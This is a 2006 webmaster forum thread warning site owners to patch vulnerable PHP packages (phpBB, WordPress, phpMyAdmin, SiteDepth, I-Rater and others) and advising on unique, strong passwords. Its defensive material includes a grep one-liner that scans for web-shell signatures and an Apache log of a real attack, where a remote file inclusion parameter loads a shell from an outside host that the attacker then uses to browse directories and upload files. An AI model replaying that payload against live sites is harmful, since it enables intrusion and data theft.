Security Advisories for multiple products

cd34 · 2006-05-16, 12:37 PM

Recently, we've seen a huge number of exploits running through commonly installed software -- software that usually has already released a fix. However, you may not have even known that there was an upgrade.

If you are running any of the following software, take a few minutes to check and see that you are running the latest version.

Vbulletin, 3.5.4 (or, have applied the diffs to upgrade the two .php files that are exploitable)

PHPBB, 2.0.20 -- mostly bug fixes in the recent version. 2.0.19 released in December fixed an authentication leak. 2.0.18 was released in October 2005 which fixed a hole allowing remote scripts to be installed.

Invision Power Board - 2.15 - SQL Injection, Remote script execution, ability to upload images with malicious html/javascript code.

Autolinks -- ages ago, this had an issue with al_initialize.php being able to be used to launch attacks. This has been fixed, but, should be upgraded to the latest version.

phpmyadmin -- 2.8.0.4 is the most recent version and fixes a few issues allowing remote code execution.

phpadsnew -- 2.0.8, earlier versions allow remote code execution through adxmlrpc.php. Upgrading is rather straightforward. Make a backup of config.inc.php, upload the files, chmod 777 config.inc.php, log in, it'll run the upgrade automatically, chmod 644 config.inc.php. Even 2.0.7 released in March is able to be compromised.

wordpress -- if you are not running 2.0.3, there is a remote code exploit. The wordpress upgrade is pretty simple and straightforward.

awstats -- 6.6, 6.5 has an entry point that could allow remote code execution.

sitedepth -- ask them for an updated copy of constants.php. Special thanks to three people for forwarding that info -- if you want attribution, let me know and I'll modify the entry here.

--- Forwarded from 'someone'
I-RATER -- They emailed out a new "common.php" on April 26th. With spam filters and the php file being an attachment, it may not have made it to a lot of people.

The email body __________________________

"We have been made aware of a security vulnerability in ALL versions of
I-RATER PLATINUM allowing a remote user to exploit the common.php
"include_path" Parameter Remote File Inclusion.

Users should replace the attached common.php file immediately.
Many thanks
I-RATER DEV TEAM
________________________________________

phpBazar version 2.10 -- if you are running an older version there are numerous holes that allow remote code execution.

If you are using mailform software, verify that you are running the newest version. In recent months, scripts have been scanning machines for vulnerable mailform scripts. If you're seeing a lot of email from submission forms, you might want to take a look as you might be relaying spam unknowingly.

If your webhost runs apache without running setuid, have them run the following check on your web directories:

find . -name \*.php -user www-data -print > /tmp/webownedphp

replace www-data with the username that the webserver runs as. If you admin your own machine, try:

ps aux | grep http
or
ps aux | grep apache

in the first column, there should be a listing of usernames, perhaps nobody, or www or www-data.

Once you have done that, more /tmp/webownedphp, then, take a look to make sure those scripts look valid. If you see an ascii picture of a spider or a lot of cyrillic characters that you don't recognize, its probably a remote shell program. With that, they can get in and run remote scripts as the web user. Those scripts can attach to irc servers and launch denial of service attacks, they can launch spam engines, or, all sorts of other nasty things.

Another attack that we have recently seen is the inclusion of javascript on web pages. Some of these are scripts that are loaded that run remotely and try to change every file they can, while others actually log in with FTP, grab a file, modify it, put the file back in place and log out. There's no hunting around for the right file, no authentication errors, nothing that suggests that they don't have the exact username/password that you use.

What this says is either the person has used spyware or a keylogger to get the user/password, or, each of the people this has happened to has used the same user/password combination somewhere -- and the people were able to determine the connection of the user/password with the domain involved.

Tommy keeps an address book with each sponsor's site name and the unique user/pass for each of those sites tucked away. A different username/password combination is used for email, ftp, each server, each sponsor account, each online login that you have. Cleo uses a program on her mac that stores it away electronically behind a password.

Either way you do it, you need to make sure that you use different username/password combinations everywhere so that a single compromised password doesn't ruin everything you've worked towards. And passwords need to be strong. Easy to guess dictionary words are terrible. Letters, numbers, and punctuation (some sponsor programs don't allow this) all make it more difficult to guess. If you have trouble remembering passwords, refer to that black book.

However, as one client of mine found out, after a nasty divorce, his house was broken into when he was out of town and his black book was stolen. Nothing else in the house was touched. Guard that book well as it is just as valuable as storing the passwords online.

Remember, if your site is hacked, that could directly affect your revenue and in some cases, jeopardize your site staying up. Many hosting companies will shut down a server that generates complaints -- making it impossible for you to fix remotely.

emmanuelle · 2006-05-16, 12:53 PM

Very helpful info- thanks for doing the heavy lifting!

MrYum · 2006-05-16, 12:56 PM

Excellent info and advice...thanks Sparky

Jim · 2006-05-16, 01:07 PM

Finally

Thanks for the info, my friend

BillyWRN · 2006-05-16, 01:15 PM

Very helpful, Thanks a bunch for posting it.

f69j69b · 2006-05-16, 01:22 PM

we are very fortunate to have you as a member of this board thanks cd34

Fred

SirMoby · 2006-05-16, 04:09 PM

You rock. I think I'm getting lazy so it's nice to read your posts

digital2 · 2006-05-17, 07:09 PM

Thanks Very Much..Data Very Profitable...

terry · 2006-05-18, 07:55 AM

Thanks for the info. I recently had major issues with autogallery sql and hackers... just wanted to add that one to your list. You can find info about it on their site, jmbsoft.com.

cd34 · 2006-05-19, 03:15 PM

added phpBazar to the list -- if you're running classifieds using it, there are a ton of holes in the older versions.

cd34 · 2006-05-24, 03:00 PM

find -L /var/www -name \*.php -user www-data -print > /var/tmp/webownedphp
awk -F"|"< /var/tmp/webownedphp '{ print "grep -ilE \"$\(r57|c99$shell\)|$passthru|exec|system|eval$\\\(\" \"" $1 "\""}' | sh > /var/tmp/exploits

somewhat helpful in finding most of the exploits -- or at least weeding the list down quite a bit.

cd34 · 2006-05-24, 03:18 PM

add to the list a potential exploit through bblog -- although, that software doesn't have indexes on most of the queries and will be a performance problem if you get more than casual traffic on it.

nottslad · 2006-05-25, 10:10 PM

Thanks for that! I'd have missed it without your post.

I have a site running I-Rater, set it up about 2 years ago with my old UK ISP email which I no longer have access to. I've submitted a support request to get the needed files and change my contact details.

Plus, it also gave me a new idea to use on of my mainstream domains.

emmanuelle · 2006-05-26, 11:46 AM

Irater sent out a mailer a few weeks ago about the problem, and with a fix. If you don't have it, I can forward it to you

cd34 · 2006-06-01, 06:49 PM

Wordpress released 2.0.3 today which fixes a security issue.

ClickBuster · 2006-06-01, 07:01 PM

I'm updating right now, Thanks for the heads up

Bill · 2006-06-01, 07:06 PM

I was wondering about that - I hadn't seen any sign that the 2.0.2 version was adapted to this new security threat.

What about phpmyadmin and phpadsnew - are the latest versions of those secure? Wasn't the scuttlebut that they were both risks with these new attacks?

MrMaryLou · 2006-06-01, 07:08 PM

I updated Wordpress today is was a snap

Thanks to Sparky

Useless · 2006-06-01, 07:47 PM

Quote:

Originally Posted by cd34

Wordpress released 2.0.3 today which fixes a security issue.

Anyone know if there's documentation on which files were altered for this update? I've done some ugly changes and don't want risk overwriting files if I don't have to.

Ms Naughty · 2006-06-02, 03:09 AM

I'm congratulating myself on upgrading without any major stuff-ups.

In terms of what's new, I don't know of a list, but you can spot what's new if you sort by date in your FTP program.

I just backed up the whole lot and uploaded the new stuff over the old. Except for my theme.

cd34 · 2006-08-06, 12:49 PM

Wordpress: http://wordpress.org/development/2006/07/wordpress-204/

If you run sitedepth, you might want to make sure you clean up the old backups after the upgrades are done. Here's a log showing how XSS works using a current, updated version of sitedepth. The new version was fixed with a patch from SiteDepth due to this thread, however, they methodically store their 'old versions' after upgrade in a pretty predictable manner. No problem for the script kiddie to stumble across the files he needed. After this person exploited the site, they loaded a shell on one of the sitedepth main scripts located in a directory which was world writeable -- way to go guys.

Code:

84.169.229.61 - - [02/Aug/2006:17:17:28 -0400] "GET /sd3/ HTTP/1.1" 404 202 "http://www.xxx-xxxxxx.com/sd3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
84.169.229.61 - - [02/Aug/2006:17:58:53 -0400] "GET /sitedepth3/ HTTP/1.1" 200 1101 "http://www.xxx-xxxxxx.com/sitedepth3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

[guy surfs front page of site to confirm site is running sitedepth. clipped]

84.169.229.61 - - [02/Aug/2006:18:01:04 -0400] "GET /constants.php?SD_DIR=http://www.paradox-hackz.de/showimg.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:01:13 -0400] "GET /sitedepth3/constants.php?SD_DIR=http://www.paradox-hackz.de/showimg.txt? HTTP/1.1" 200 8 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:01:19 -0400] "GET /sitedepth3/backup/ HTTP/1.1" 403 220 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:01:26 -0400] "GET /sitedepth3/backup/previous_versions/ HTTP/1.1" 403 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:01:35 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http://www.paradox-hackz.de/showimg.txt? HTTP/1.1" 200 5469 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:01:42 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=. HTTP/1.1" 200 18624 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http://www.paradox-hackz.de/showimg.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:01:46 -0400] "POST /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r& HTTP/1.1" 200 22411 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=." "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:01:55 -0400] "POST /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r& HTTP/1.1" 200 8457 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:02:06 -0400] "POST /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r& HTTP/1.1" 200 142138 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=." "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:02:16 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=/var/www/xxuserxx/xxx-xxxxxx.com//_old_sitedepth HTTP/1.1" 200 76195 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:02:26 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=/var/www/xxuserxx/xxx-xxxxxx.com//sections HTTP/1.1" 200 9534 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:02:33 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=/var/www/xxuserxx/xxx-xxxxxx.com//previews HTTP/1.1" 200 9534 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:02:42 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=/var/www/xxuserxx/xxx-xxxxxx.com//ccbill HTTP/1.1" 200 18781 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"84.169.229.61 - - [02/Aug/2006:18:02:50 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=file&file=/var/www/xxuserxx/xxx-xxxxxx.com/ccbill/*index.htm HTTP/1.1" 200 16180 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=/var/www/xxuserxx/xxx-xxxxxx.com//ccbill" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:03:08 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=/var/www/xxuserxx/xxx-xxxxxx.com//sections HTTP/1.1" 200 9534 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:03:11 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=upload&dir=/var/www/xxuserxx/xxx-xxxxxx.com/sections&lastcmd=dir&lastdir=/var/www/xxuserxx/xxx-xxxxxx.com/sections HTTP/1.1" 200 5670 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=/var/www/xxuserxx/xxx-xxxxxx.com//sections" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:03:22 -0400] "POST /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r& HTTP/1.1" 200 5132 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=upload&dir=/var/www/xxuserxx/xxx-xxxxxx.com/sections&lastcmd=dir&lastdir=/var/www/xxuserxx/xxx-xxxxxx.com/sections" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"

cd34 · 2006-08-07, 11:20 AM

phpmyadmin, subject to XSS vulnerability, again, redux. If you're not running version 2.8.2.1, update quickly.

http://www.phpmyadmin.net/home_page/...php?relnotes=0

If you use PHPMyAdmin, I would suggest you put it behind .htaccess/.htpasswd authentication, or protect it from being accessed from other locations around the net -- while you're still not protected, you are at least making it much more difficult for the systematic scans to discover your whereabouts.

Addendum to the sitedepth note: You may delete files in the previous_versions directory after the upgrade has been performed.

2006-05-16, 12:37 PM	#1
cd34 a.k.a. Sparky Join Date: Sep 2004 Location: West Palm Beach, FL, USA Posts: 2,396	Security Advisories for multiple products Recently, we've seen a huge number of exploits running through commonly installed software -- software that usually has already released a fix. However, you may not have even known that there was an upgrade. If you are running any of the following software, take a few minutes to check and see that you are running the latest version. Vbulletin, 3.5.4 (or, have applied the diffs to upgrade the two .php files that are exploitable) PHPBB, 2.0.20 -- mostly bug fixes in the recent version. 2.0.19 released in December fixed an authentication leak. 2.0.18 was released in October 2005 which fixed a hole allowing remote scripts to be installed. Invision Power Board - 2.15 - SQL Injection, Remote script execution, ability to upload images with malicious html/javascript code. Autolinks -- ages ago, this had an issue with al_initialize.php being able to be used to launch attacks. This has been fixed, but, should be upgraded to the latest version. phpmyadmin -- 2.8.0.4 is the most recent version and fixes a few issues allowing remote code execution. phpadsnew -- 2.0.8, earlier versions allow remote code execution through adxmlrpc.php. Upgrading is rather straightforward. Make a backup of config.inc.php, upload the files, chmod 777 config.inc.php, log in, it'll run the upgrade automatically, chmod 644 config.inc.php. Even 2.0.7 released in March is able to be compromised. wordpress -- if you are not running 2.0.3, there is a remote code exploit. The wordpress upgrade is pretty simple and straightforward. awstats -- 6.6, 6.5 has an entry point that could allow remote code execution. sitedepth -- ask them for an updated copy of constants.php. Special thanks to three people for forwarding that info -- if you want attribution, let me know and I'll modify the entry here. --- Forwarded from 'someone' I-RATER -- They emailed out a new "common.php" on April 26th. With spam filters and the php file being an attachment, it may not have made it to a lot of people. The email body __________________________ "We have been made aware of a security vulnerability in ALL versions of I-RATER PLATINUM allowing a remote user to exploit the common.php "include_path" Parameter Remote File Inclusion. Users should replace the attached common.php file immediately. Many thanks I-RATER DEV TEAM ________________________________________ phpBazar version 2.10 -- if you are running an older version there are numerous holes that allow remote code execution. If you are using mailform software, verify that you are running the newest version. In recent months, scripts have been scanning machines for vulnerable mailform scripts. If you're seeing a lot of email from submission forms, you might want to take a look as you might be relaying spam unknowingly. If your webhost runs apache without running setuid, have them run the following check on your web directories: find . -name \*.php -user www-data -print > /tmp/webownedphp replace www-data with the username that the webserver runs as. If you admin your own machine, try: ps aux \| grep http or ps aux \| grep apache in the first column, there should be a listing of usernames, perhaps nobody, or www or www-data. Once you have done that, more /tmp/webownedphp, then, take a look to make sure those scripts look valid. If you see an ascii picture of a spider or a lot of cyrillic characters that you don't recognize, its probably a remote shell program. With that, they can get in and run remote scripts as the web user. Those scripts can attach to irc servers and launch denial of service attacks, they can launch spam engines, or, all sorts of other nasty things. Another attack that we have recently seen is the inclusion of javascript on web pages. Some of these are scripts that are loaded that run remotely and try to change every file they can, while others actually log in with FTP, grab a file, modify it, put the file back in place and log out. There's no hunting around for the right file, no authentication errors, nothing that suggests that they don't have the exact username/password that you use. What this says is either the person has used spyware or a keylogger to get the user/password, or, each of the people this has happened to has used the same user/password combination somewhere -- and the people were able to determine the connection of the user/password with the domain involved. Tommy keeps an address book with each sponsor's site name and the unique user/pass for each of those sites tucked away. A different username/password combination is used for email, ftp, each server, each sponsor account, each online login that you have. Cleo uses a program on her mac that stores it away electronically behind a password. Either way you do it, you need to make sure that you use different username/password combinations everywhere so that a single compromised password doesn't ruin everything you've worked towards. And passwords need to be strong. Easy to guess dictionary words are terrible. Letters, numbers, and punctuation (some sponsor programs don't allow this) all make it more difficult to guess. If you have trouble remembering passwords, refer to that black book. However, as one client of mine found out, after a nasty divorce, his house was broken into when he was out of town and his black book was stolen. Nothing else in the house was touched. Guard that book well as it is just as valuable as storing the passwords online. Remember, if your site is hacked, that could directly affect your revenue and in some cases, jeopardize your site staying up. Many hosting companies will shut down a server that generates complaints -- making it impossible for you to fix remotely.

2006-05-16, 12:56 PM	#3
MrYum Arghhhh...submit yer sites ya ruddy swabs! Join Date: May 2004 Location: Sunny Florida! Posts: 5,108	Excellent info and advice...thanks Sparky __________________ Porno Flixxx Submissions SOTI Site Submissions Free Porn Resource Submissions

2006-05-16, 01:15 PM	#5
BillyWRN Aw, Dad, you've done a lot of great things, but you're a very old man, and old people are useless Join Date: Jul 2004 Posts: 20	Very helpful, Thanks a bunch for posting it. __________________

2006-05-16, 01:22 PM	#6
f69j69b With $10,000, we'd be millionaires! We could buy all kinds of useful things like ... love! Join Date: Jan 2004 Location: colorado Posts: 318	we are very fortunate to have you as a member of this board thanks cd34 Fred __________________ https://furry-yiff.com/

2006-05-18, 07:55 AM	#9
terry You can now put whatever you want in this space :) Join Date: Apr 2004 Location: Montreal Posts: 5,883	Thanks for the info. I recently had major issues with autogallery sql and hackers... just wanted to add that one to your list. You can find info about it on their site, jmbsoft.com. __________________ Stop That 9 To 5 Go Green Grocery Store

2006-05-16, 12:53 PM	#2
emmanuelle 0100011101100101011001010 1101011001000000100001101 1010000110100101100011 Join Date: Mar 2004 Location: Montreal Posts: 1,441	Very helpful info- thanks for doing the heavy lifting!

2006-05-16, 01:07 PM	#4
Jim Banned Join Date: Aug 2003 Location: Mohawk, New York Posts: 19,477	Finally Thanks for the info, my friend

2006-05-16, 04:09 PM	#7
SirMoby Jim? I heard he's a dirty pornographer. Join Date: Aug 2003 Location: Washington, DC Posts: 2,706	You rock. I think I'm getting lazy so it's nice to read your posts

2006-05-17, 07:09 PM	#8
digital2 A woman is like beer. They look good, they smell good, and you'd step over your own mother just to get one! Join Date: Aug 2004 Location: Spain Posts: 51	Thanks Very Much..Data Very Profitable...

2006-05-19, 03:15 PM	#10
cd34 a.k.a. Sparky Join Date: Sep 2004 Location: West Palm Beach, FL, USA Posts: 2,396	added phpBazar to the list -- if you're running classifieds using it, there are a ton of holes in the older versions. __________________ SnapReplay.com a different way to share photos - iPhone & Android

2006-05-24, 03:00 PM	#11
cd34 a.k.a. Sparky Join Date: Sep 2004 Location: West Palm Beach, FL, USA Posts: 2,396	find -L /var/www -name \*.php -user www-data -print > /var/tmp/webownedphp awk -F"\|"< /var/tmp/webownedphp '{ print "grep -ilE \"\(\(r57\|c99\)shell\)\|\(passthru\|exec\|system\|eval\)\\\(\" \"" $1 "\""}' \| sh > /var/tmp/exploits somewhat helpful in finding most of the exploits -- or at least weeding the list down quite a bit. __________________ SnapReplay.com a different way to share photos - iPhone & Android

2006-05-24, 03:18 PM	#12
cd34 a.k.a. Sparky Join Date: Sep 2004 Location: West Palm Beach, FL, USA Posts: 2,396	add to the list a potential exploit through bblog -- although, that software doesn't have indexes on most of the queries and will be a performance problem if you get more than casual traffic on it. __________________ SnapReplay.com a different way to share photos - iPhone & Android

2006-05-25, 10:10 PM	#13
nottslad Lord help me, I'm just not that bright Join Date: Dec 2004 Location: Mexico Posts: 107	Thanks for that! I'd have missed it without your post. I have a site running I-Rater, set it up about 2 years ago with my old UK ISP email which I no longer have access to. I've submitted a support request to get the needed files and change my contact details. Plus, it also gave me a new idea to use on of my mainstream domains.

2006-05-26, 11:46 AM	#14
emmanuelle 0100011101100101011001010 1101011001000000100001101 1010000110100101100011 Join Date: Mar 2004 Location: Montreal Posts: 1,441	Irater sent out a mailer a few weeks ago about the problem, and with a fix. If you don't have it, I can forward it to you

2006-06-01, 06:49 PM	#15
cd34 a.k.a. Sparky Join Date: Sep 2004 Location: West Palm Beach, FL, USA Posts: 2,396	Wordpress released 2.0.3 today which fixes a security issue. __________________ SnapReplay.com a different way to share photos - iPhone & Android

2006-06-01, 07:01 PM	#16
ClickBuster I'm normally not a praying man, but if you're up there, please save me Superman! Join Date: Dec 2004 Location: Bulgaria Posts: 476	I'm updating right now, Thanks for the heads up __________________ The tendency is to push it as far as you can -- Fear and Loathing In Las Vegas

2006-06-01, 07:06 PM	#17
Bill Selling porn allows me to stay in a constant state of Bliss - ain't that a trip! Join Date: Apr 2003 Posts: 3,914	I was wondering about that - I hadn't seen any sign that the 2.0.2 version was adapted to this new security threat. What about phpmyadmin and phpadsnew - are the latest versions of those secure? Wasn't the scuttlebut that they were both risks with these new attacks?

2006-06-01, 07:08 PM	#18
MrMaryLou i fucking told i type to fucking fast wtf Join Date: Mar 2003 Location: New York Posts: 11,247	I updated Wordpress today is was a snap Thanks to Sparky __________________ <a href="http://www.greenguysboard.com/onthebench/">Join Me For On The Bench </a>

2006-06-02, 03:09 AM	#20
Ms Naughty old enough to be Grandma Scrotum Join Date: Aug 2003 Location: Australia Posts: 1,408	I'm congratulating myself on upgrading without any major stuff-ups. In terms of what's new, I don't know of a list, but you can spot what's new if you sort by date in your FTP program. I just backed up the whole lot and uploaded the new stuff over the old. Except for my theme. __________________ Promote Bright Desire

2006-08-07, 11:20 AM	#22
cd34 a.k.a. Sparky Join Date: Sep 2004 Location: West Palm Beach, FL, USA Posts: 2,396	phpmyadmin, subject to XSS vulnerability, again, redux. If you're not running version 2.8.2.1, update quickly. http://www.phpmyadmin.net/home_page/...php?relnotes=0 If you use PHPMyAdmin, I would suggest you put it behind .htaccess/.htpasswd authentication, or protect it from being accessed from other locations around the net -- while you're still not protected, you are at least making it much more difficult for the systematic scans to discover your whereabouts. Addendum to the sitedepth note: You may delete files in the previous_versions directory after the upgrade has been performed. __________________ SnapReplay.com a different way to share photos - iPhone & Android